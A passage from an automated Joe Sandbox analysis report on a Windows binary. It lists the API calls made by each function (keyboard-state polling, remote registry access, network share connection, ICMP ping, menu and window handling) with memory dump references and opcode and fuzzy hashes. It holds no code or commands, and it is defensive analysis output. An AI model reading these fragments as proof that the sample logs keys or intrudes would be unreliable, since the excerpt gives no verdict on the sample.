                          • GetAsyncKeyState.USER32(0000005B), ref: 00B43A84
                          • GetKeyState.USER32(0000005B), ref: 00B43A92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 02faeb52efbf056852039375002c9a66c1a44b2af5fb4adfb00b8a11c9dbbdd4
                          • Instruction ID: 32e20c145097c4ca3315b62bf70bb34f3d635543d71728da065c63d86a56b34f
                          • Opcode Fuzzy Hash: 02faeb52efbf056852039375002c9a66c1a44b2af5fb4adfb00b8a11c9dbbdd4
                          • Instruction Fuzzy Hash: D7519520A0478869FB35EBA488517EEEBF4DF11B40F0C85DAD5C25A1C3DB549B8CEB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00B3FB19
                          • GetWindowRect.USER32(00000000,?), ref: 00B3FB2B
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B3FB89
                          • GetDlgItem.USER32(?,00000002), ref: 00B3FB94
                          • GetWindowRect.USER32(00000000,?), ref: 00B3FBA6
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B3FBFC
                          • GetDlgItem.USER32(?,000003E9), ref: 00B3FC0A
                          • GetWindowRect.USER32(00000000,?), ref: 00B3FC1B
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B3FC5E
                          • GetDlgItem.USER32(?,000003EA), ref: 00B3FC6C
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B3FC89
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B3FC96
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 08d4df480ef9c0eb3236bb477ff750efd364fc38411aeb02642468122d5882b7
                          • Instruction ID: f8ee25d9189fea09fb76f04a997dcc3fc27fa6f4f1969861f3828271ae9b181c
                          • Opcode Fuzzy Hash: 08d4df480ef9c0eb3236bb477ff750efd364fc38411aeb02642468122d5882b7
                          • Instruction Fuzzy Hash: E951F171B00209AFDB18DF69DD95AAEBBB5EB88710F64816DF915D72D0DB709D00CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • GetSysColor.USER32(0000000F), ref: 00B1B067
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: aefc857612f998c764f74b45f1d3f33f2fc10e28570483ba6011e2f12f65043a
                          • Instruction ID: c5e1ca98d63b01d3ff9b1232397f666ad3e372751d174a56f3ed13d4455fca1e
                          • Opcode Fuzzy Hash: aefc857612f998c764f74b45f1d3f33f2fc10e28570483ba6011e2f12f65043a
                          • Instruction Fuzzy Hash: DE417031100540ABDB206F28D888FEA37A6EF0A720F5442A6FD759B1E1DB318C81DB22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: b5f59ad072f647481b0a03130791023c9342fe3f16594726c1a48e8a2685249c
                          • Instruction ID: b6a98e76ef5fe282a45a0f47a5d3e82be41b6c2a0269f2017c5e6a99e7236786
                          • Opcode Fuzzy Hash: b5f59ad072f647481b0a03130791023c9342fe3f16594726c1a48e8a2685249c
                          • Instruction Fuzzy Hash: 1C411AB280412CAACB21EB54DC41EEE73FCEB18310F0045E6B509A2051EF34ABD5CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __swprintf.LIBCMT ref: 00B084E5
                          • __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B22177: _xtow@16.LIBCMT ref: 00B22198
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __itow__swprintf_xtow@16
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 1502193981-2263619337
                          • Opcode ID: 22419ea5e093807d302094b021ee67e7a6c6017b62af48f3e7c56f6e90f495a6
                          • Instruction ID: 56684a3a3a867afd419dccfd51e495a24e3a7d586b2e4fbcd9707c0c71adc98b
                          • Opcode Fuzzy Hash: 22419ea5e093807d302094b021ee67e7a6c6017b62af48f3e7c56f6e90f495a6
                          • Instruction Fuzzy Hash: 6841C571A00615ABDB34DB38D882E6A7BE5FF54310F2084DAE59ED62D2EA719B41CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • _memset.LIBCMT ref: 00B3AF74
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B3AFA9
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B3AFC5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B3AFE1
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B3B00B
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B3B03E
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B3B043
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2OpenQueryRegistryValue_memmove_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 4211336532-22481851
                          • Opcode ID: 9ce3ee5021eead5327db89da76394399507bf8659af17bd6ca4149f0ed1a6a96
                          • Instruction ID: 4dea5103586854ac5e1619360316bbeec339ac915eb9d88e7dcb0a9d167fe4f1
                          • Opcode Fuzzy Hash: 9ce3ee5021eead5327db89da76394399507bf8659af17bd6ca4149f0ed1a6a96
                          • Instruction Fuzzy Hash: 23412A76C10229ABDF15EBA4DC95DEEBBB8FF14700F1045A9E906A31A0DB709E05CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B25CCA
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • __gmtime64_s.LIBCMT ref: 00B25D63
                          • __gmtime64_s.LIBCMT ref: 00B25D99
                          • __gmtime64_s.LIBCMT ref: 00B25DB6
                          • __allrem.LIBCMT ref: 00B25E0C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B25E28
                          • __allrem.LIBCMT ref: 00B25E3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B25E5D
                          • __allrem.LIBCMT ref: 00B25E74
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B25E92
                          • __invoke_watson.LIBCMT ref: 00B25F03
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction ID: be7410cef2f615886fda50f67255abd9fb024104ce8c1a9f90b2fdab98f1efe7
                          • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction Fuzzy Hash: B971EB71A01B26ABD724AF78DC82BAA73E4FF14764F1441B9F518D7681E770DE408790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B45816
                          • GetMenuItemInfoW.USER32(00BC18F0,000000FF,00000000,00000030), ref: 00B45877
                          • SetMenuItemInfoW.USER32(00BC18F0,00000004,00000000,00000030), ref: 00B458AD
                          • Sleep.KERNEL32(000001F4), ref: 00B458BF
                          • GetMenuItemCount.USER32(?), ref: 00B45903
                          • GetMenuItemID.USER32(?,00000000), ref: 00B4591F
                          • GetMenuItemID.USER32(?,-00000001), ref: 00B45949
                          • GetMenuItemID.USER32(?,?), ref: 00B4598E
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B459D4
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B459E8
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B45A09
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: a94dcb247ed73f970a621784780bb4601cac39832e09630d3a64da55434409d7
                          • Instruction ID: 9670c64ece146db8c1292907f72b013233a7a9c5035a29b10dcd26d112d45138
                          • Opcode Fuzzy Hash: a94dcb247ed73f970a621784780bb4601cac39832e09630d3a64da55434409d7
                          • Instruction Fuzzy Hash: 0E61B370900A49EFDF21DFA4D888EBE7BF8EB05314F14059AF441A7252DB309E05EB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B69AA5
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B69AA8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B69ACC
                          • _memset.LIBCMT ref: 00B69ADD
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B69AEF
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B69B67
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 0137ffc06365ba16a5d947a976b2d5f9c907b471876082de9e07ff8a3345b66b
                          • Instruction ID: 13b70122a3e3e45f29c9e42f45062971fdee40dd2bca75d6b900f55a458982d4
                          • Opcode Fuzzy Hash: 0137ffc06365ba16a5d947a976b2d5f9c907b471876082de9e07ff8a3345b66b
                          • Instruction Fuzzy Hash: DF615975A00208AFEB11DFA8CC81EEE77F8EB09700F140599FA15E72A2D774A945DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetKeyboardState.USER32(?), ref: 00B43591
                          • GetAsyncKeyState.USER32(000000A0), ref: 00B43612
                          • GetKeyState.USER32(000000A0), ref: 00B4362D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00B43647
                          • GetKeyState.USER32(000000A1), ref: 00B4365C
                          • GetAsyncKeyState.USER32(00000011), ref: 00B43674
                          • GetKeyState.USER32(00000011), ref: 00B43686
                          • GetAsyncKeyState.USER32(00000012), ref: 00B4369E
                          • GetKeyState.USER32(00000012), ref: 00B436B0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00B436C8
                          • GetKeyState.USER32(0000005B), ref: 00B436DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 8d3ad508a26e425ff3f45dc7a4d079b2e172d16f2b57683d6e3927f2bdf35e0c
                          • Instruction ID: 808062d445c5803ebadff8ddcf3796691aaf9e240ccdc42f08acb482f1698c6c
                          • Opcode Fuzzy Hash: 8d3ad508a26e425ff3f45dc7a4d079b2e172d16f2b57683d6e3927f2bdf35e0c
                          • Instruction Fuzzy Hash: 0B4195705087CA7DFF719B6484153A5BAE0EB21B44F0C80DAD5C6472C2DBB59BC8DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00B3A2AA
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00B3A2F5
                          • VariantInit.OLEAUT32(?), ref: 00B3A307
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B3A327
                          • VariantCopy.OLEAUT32(?,?), ref: 00B3A36A
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B3A37E
                          • VariantClear.OLEAUT32(?), ref: 00B3A393
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00B3A3A0
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B3A3A9
                          • VariantClear.OLEAUT32(?), ref: 00B3A3BB
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B3A3C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: fa5d6cace2fc4bec07fbc0dff933e1c8fc67b23c8dfd28fdfcdd02115d7572e4
                          • Instruction ID: ecd1a32014f2627ac42e19d94b5afb61ac9292e355ad79a9fff0a4aba5859f73
                          • Opcode Fuzzy Hash: fa5d6cace2fc4bec07fbc0dff933e1c8fc67b23c8dfd28fdfcdd02115d7572e4
                          • Instruction Fuzzy Hash: F5412135900219AFCB01DFA4DC889DEBFB9FF44354F2480A5F551A72A1DB31AA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00B586F5
                          • inet_addr.WS2_32(?), ref: 00B5873A
                          • gethostbyname.WS2_32(?), ref: 00B58746
                          • IcmpCreateFile.IPHLPAPI ref: 00B58754
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B587C4
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B587DA
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B5884F
                          • WSACleanup.WS2_32 ref: 00B58855
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 323529b357c46ccc501986dfffa9923a9f7c9f1e225eb94fd2f86e26d44d41e5
                          • Instruction ID: 2b0cffe18608d22b22bd081c62c714b3b9aaf8b6c50c41198fc446b16403f9cc
                          • Opcode Fuzzy Hash: 323529b357c46ccc501986dfffa9923a9f7c9f1e225eb94fd2f86e26d44d41e5
                          • Instruction Fuzzy Hash: D75180316042019FD711AF20CC85B6ABBE4EF48721F1449EAF956AB2E1DF70ED05CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B69C68
                          • CreateMenu.USER32 ref: 00B69C83
                          • SetMenu.USER32(?,00000000), ref: 00B69C92
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B69D1F
                          • IsMenu.USER32(?), ref: 00B69D35
                          • CreatePopupMenu.USER32 ref: 00B69D3F
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B69D70
                          • DrawMenuBar.USER32 ref: 00B69D7E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                          • String ID: 0
                          • API String ID: 176399719-4108050209
                          • Opcode ID: 4bfd6ac9989d0fe6da566135766c11d0e8fe3ab786609fbc5413cbad0131c0bc
                          • Instruction ID: 117a52c8eca69ebd19450637131af64322eb0cb37a6f4ce8d3fa490407eb1b9c
                          • Opcode Fuzzy Hash: 4bfd6ac9989d0fe6da566135766c11d0e8fe3ab786609fbc5413cbad0131c0bc
                          • Instruction Fuzzy Hash: E3412575A00209EFDB10EF68D984BEA7BF9FF49314F140469E945A73A1DB34A910DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4EC1E
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B4EC94
                          • GetLastError.KERNEL32 ref: 00B4EC9E
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00B4ED0B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 56173c2d257e844bfc248099d762edaf70f6fbcbf0d97eb3184692be825fe9e6
                          • Instruction ID: 3a231f8e91cfed0d3fc23ccb12c5dcb331ddc4f74c53fe5278666f2d2c2fad68
                          • Opcode Fuzzy Hash: 56173c2d257e844bfc248099d762edaf70f6fbcbf0d97eb3184692be825fe9e6
                          • Instruction Fuzzy Hash: 4F316F35A00209AFD710EB64C989EAEBBF4FF44710F1440A6E512E72E2DB71DE41DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

